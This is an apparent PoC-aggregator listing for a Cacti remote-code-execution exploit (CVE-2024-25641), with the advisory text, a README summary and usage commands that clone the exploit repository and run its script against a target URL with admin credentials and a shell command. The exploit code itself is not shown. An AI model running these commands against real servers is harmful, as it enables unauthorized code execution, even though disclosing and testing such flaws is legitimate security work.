
CVE-2024-25641 PoC — Cacti Security Vulnerability

Source
Associated Vulnerability
Title: Cacti Security Vulnerability (CVE-2024-25641)
Description: Cacti is an open-source network traffic monitoring and analysis tool from the Cacti team. It collects data via snmpget, renders graphs with RRDtool for analysis, and provides data and user management features. Cacti versions before 1.2.27 contain a security vulnerability: an arbitrary file write flaw allows an authenticated user to execute arbitrary PHP code on the web server.
Description
Fully automated PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
Readme
# CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵

- [x] `Authenticated RCE`
- [x] `Cacti version < v1.2.26`

## Summary
___

An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).


## Proof Of Concept
___

![CVE DEMO](https://github.com/user-attachments/assets/1ee4800b-4fc1-4bf4-8b7a-a4e5999143e9)

## Usage
___

```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

### With poetry
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```
File Snapshot

```
[4.0K] /data/pocs/116f746f920771769811f0fed744ce7551105dfe
├── [4.0K] core
│   ├── [   0] __init__.py
│   └── [2.7K] Output.py
├── [8.6K] CVE-2024-25641.py
├── [ 38K] poetry.lock
├── [ 412] pyproject.toml
├── [1018] README.md
└── [ 111] requirements.txt

1 directory, 7 files
```